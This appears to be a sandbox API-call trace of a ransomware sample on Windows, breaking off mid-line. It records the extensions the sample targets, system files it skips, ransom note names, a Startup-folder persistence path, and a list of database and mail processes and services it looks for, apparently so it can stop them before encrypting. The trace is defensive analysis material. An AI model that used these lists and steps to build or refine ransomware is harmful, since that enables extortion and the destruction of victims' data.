(lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0261.784] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5b2f00 | out: hHeap=0x520000) returned 1 [0261.784] lstrlenW (lpString="") returned 0 [0261.784] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57c830 | out: hHeap=0x520000) returned 1 [0261.784] lstrlenW (lpString=".USA") returned 4 [0261.785] lstrlenW (lpString=".USA") returned 4 [0261.785] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57c830 | out: hHeap=0x520000) returned 1 [0261.785] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x57c860, Size=0x20) returned 0x559da0 [0261.785] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559da0, Size=0x40) returned 0x55aec8 [0261.785] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55aec8, Size=0x80) returned 0x59eef0 [0261.785] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2298, Size=0x8) returned 0x5a22a8 [0261.785] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a22a8, Size=0x10) returned 0x57c860 [0261.785] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x57c860, Size=0x20) returned 0x559df0 [0261.785] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0261.785] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x59eef0 | out: hHeap=0x520000) returned 1 [0261.785] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b2f30, Size=0x20) returned 0x559e18 [0261.785] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559e18, Size=0x40) returned 0x55aec8 [0261.785] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19 [0261.785] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19 [0261.785] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55aec8 | out: hHeap=0x520000) returned 1 [0261.785] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b2f30, Size=0x20) returned 0x559e18 [0261.785] lstrlenW (lpString="Info.hta") returned 8 [0261.785] lstrlenW (lpString="Info.hta") returned 8 [0261.785] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559e18 | out: hHeap=0x520000) returned 1 [0261.786] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5d5e10, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\payload.exe")) returned 0x67 [0263.313] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5d5e10 | out: hHeap=0x520000) returned 1 [0263.313] lstrlenW (lpString="payload.exe") returned 11 [0263.313] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559df0, Size=0x40) returned 0x55af58 [0263.313] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b2f90, Size=0x20) returned 0x559df0 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b2f90, Size=0x20) returned 0x559f58 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559f58, Size=0x40) returned 0x55afa0 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55afa0, Size=0x80) returned 0x59eef0 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59eef0, Size=0x100) returned 0x571000 [0263.314] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0263.314] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x571000 | out: hHeap=0x520000) returned 1 [0263.314] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x5d5de8, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0263.314] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5e5df0 | out: hHeap=0x520000) returned 1 [0263.314] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5d5de8 | out: hHeap=0x520000) returned 1 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a22a8, Size=0x8) returned 0x5a2298 [0263.314] lstrlenW (lpString="%windir%;") returned 9 [0263.314] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559df0 | out: hHeap=0x520000) returned 1 [0263.314] lstrlenW (lpString="C:\\Windows;") returned 11 [0263.314] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5802e8 | out: hHeap=0x520000) returned 1 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3068, Size=0x20) returned 0x559df0 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559df0, Size=0x40) returned 0x55afa0 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55afa0, Size=0x80) returned 0x59eef0 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59eef0, Size=0x100) returned 0x571000 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3718, Size=0x8) returned 0x5b3728 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3728, Size=0x10) returned 0x5b30b0 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b30b0, Size=0x20) returned 0x559df0 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a22a8, Size=0x8) returned 0x5b3718 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a22b8, Size=0x8) returned 0x5a22a8 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3728, Size=0x8) returned 0x5b3738 [0263.314] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3738, Size=0x10) returned 0x5b3158 [0263.315] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3158, Size=0x20) returned 0x559f58 [0263.315] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3718, Size=0x10) returned 0x5b3158 [0263.315] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a22a8, Size=0x10) returned 0x5b3188 [0263.315] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3718, Size=0x8) returned 0x5b3728 [0263.315] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3748, Size=0x8) returned 0x5b3758 [0263.315] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3158, Size=0x20) returned 0x559f80 [0263.315] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3188, Size=0x20) returned 0x559fa8 [0263.315] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3768, Size=0x8) returned 0x5b3778 [0263.315] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3200, Size=0x20) returned 0x559ff8 [0263.315] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x5802e8, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0263.315] lstrlenW (lpString="C:\\") returned 3 [0263.315] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fcac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fcac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0263.315] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5802e8 | out: hHeap=0x520000) returned 1 [0263.315] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b37a8, Size=0x82) returned 0x573258 [0263.315] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b37c8, Size=0x100) returned 0x571000 [0263.315] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x573258, Size=0x104) returned 0x5b3c20 [0263.315] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x571000, Size=0x200) returned 0x577490 [0263.316] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5b37b8 | out: hHeap=0x520000) returned 1 [0263.316] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x577490 | out: hHeap=0x520000) returned 1 [0263.316] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5b32a8 | out: hHeap=0x520000) returned 1 [0263.316] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x59f110 | out: hHeap=0x520000) returned 1 [0263.316] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5b3260 | out: hHeap=0x520000) returned 1 [0263.316] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x59f088 | out: hHeap=0x520000) returned 1 [0263.316] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5b3290 | out: hHeap=0x520000) returned 1 [0263.316] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5b3c20 | out: hHeap=0x520000) returned 1 [0263.316] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5b3278 | out: hHeap=0x520000) returned 1 [0263.316] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5b3b00 | out: hHeap=0x520000) returned 1 [0263.316] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5b32c0 | out: hHeap=0x520000) returned 1 [0263.316] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5b3b90 | out: hHeap=0x520000) returned 1 [0263.317] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5b32d8 | out: hHeap=0x520000) returned 1 [0263.317] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b32d8, Size=0x20) returned 0x55a020 [0263.317] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55a020, Size=0x40) returned 0x55afa0 [0263.520] WaitForMultipleObjects (nCount=0x2, lpHandles=0x55be10*=0x100, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 47 os_tid = 0x584 Thread: id = 49 os_tid = 0x610 [0261.774] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5737c0 [0261.774] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5737c0, Size=0x20) returned 0x559c10 [0261.774] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559c10, Size=0x40) returned 0x55ad60 [0261.774] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55ad60, Size=0x80) returned 0x59eef0 [0261.774] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59eef0, Size=0x100) returned 0x570ef8 [0261.774] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5737c0 [0261.774] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5737c0, Size=0x20) returned 0x559c10 [0261.774] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559c10, Size=0x40) returned 0x55ad60 [0261.774] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55ad60, Size=0x80) returned 0x59eef0 [0261.774] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59eef0, Size=0x100) returned 0x571000 [0261.774] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5737c0 [0261.774] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x5a21d8 [0261.774] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5737d8 [0261.774] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a21d8, Size=0x8) returned 0x5a21e8 [0261.774] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x55a2d8 [0261.774] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a21e8, Size=0x10) returned 0x5737f0 [0261.774] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x55a2f8 [0261.774] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x559c10 [0261.774] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5737f0, Size=0x20) returned 0x559c38 [0261.775] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1c) returned 0x559c60 [0261.775] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x16) returned 0x55a318 [0261.775] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x559c88 [0261.775] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5737f0 [0261.775] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x5a21e8 [0261.775] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x55ad60 [0261.775] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a21e8, Size=0x8) returned 0x5a21d8 [0261.775] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x3c) returned 0x55ada8 [0261.775] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a21d8, Size=0x10) returned 0x573808 [0261.775] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x55a338 [0261.775] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x55a358 [0261.775] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x573808, Size=0x20) returned 0x559cb0 [0261.775] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x24) returned 0x5a0ed8 [0261.775] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0261.775] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x570ef8 | out: hHeap=0x520000) returned 1 [0261.775] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0261.775] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x571000 | out: hHeap=0x520000) returned 1 [0261.775] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x559e18 [0261.991] EnumServicesStatusExW (in: hSCManager=0x559e18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0261.991] GetLastError () returned 0xea [0261.991] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa08) returned 0x5e5e18 [0261.991] EnumServicesStatusExW (in: hSCManager=0x559e18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x5e5e18, cbBufSize=0xa08, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x5e5e18, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0261.992] CloseServiceHandle (hSCObject=0x559e18) returned 1 [0261.992] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0261.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0261.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0261.992] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0261.992] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0261.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0261.992] lstrlenW (lpString="AudioSrv") returned 8 [0261.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0261.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0261.992] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0261.992] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0261.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0261.992] lstrlenW (lpString="BFE") returned 3 [0261.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0261.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0261.992] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0261.993] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0261.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0261.993] lstrlenW (lpString="CscService") returned 10 [0261.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0261.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0261.993] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0261.993] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0261.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0261.993] lstrlenW (lpString="DcomLaunch") returned 10 [0261.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0261.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0261.993] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0261.994] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0261.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0261.994] lstrlenW (lpString="Dhcp") returned 4 [0261.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0261.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0261.994] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0261.994] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0261.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0261.994] lstrlenW (lpString="Dnscache") returned 8 [0261.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0261.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0261.994] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0261.994] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0261.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0261.994] lstrlenW (lpString="eventlog") returned 8 [0261.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0261.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0261.994] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0261.994] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0261.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0261.994] lstrlenW (lpString="EventSystem") returned 11 [0261.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0261.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0261.994] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0261.994] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0261.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0261.994] lstrlenW (lpString="gpsvc") returned 5 [0261.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0261.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0261.994] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0261.994] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0261.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0261.995] lstrlenW (lpString="lmhosts") returned 7 [0261.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0261.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0261.995] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0261.995] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0261.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0261.995] lstrlenW (lpString="MMCSS") returned 5 [0261.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0261.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0261.995] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0261.995] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0261.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0261.995] lstrlenW (lpString="nsi") returned 3 [0261.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0261.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0261.995] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0261.995] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0261.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0261.995] lstrlenW (lpString="PlugPlay") returned 8 [0261.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0261.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0261.995] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0261.995] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0261.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0261.995] lstrlenW (lpString="Power") returned 5 [0261.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0261.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0261.995] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0261.995] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0261.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0261.995] lstrlenW (lpString="ProfSvc") returned 7 [0261.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0261.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0261.996] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0261.996] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0261.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0261.996] lstrlenW (lpString="RpcEptMapper") returned 12 [0261.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0261.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0261.996] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0261.996] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0261.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0261.996] lstrlenW (lpString="RpcSs") returned 5 [0261.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0261.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0261.996] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0261.996] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0261.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0261.996] lstrlenW (lpString="SamSs") returned 5 [0261.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0261.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0261.996] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0261.996] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0261.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0261.996] lstrlenW (lpString="Schedule") returned 8 [0261.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0261.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0261.996] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0261.996] 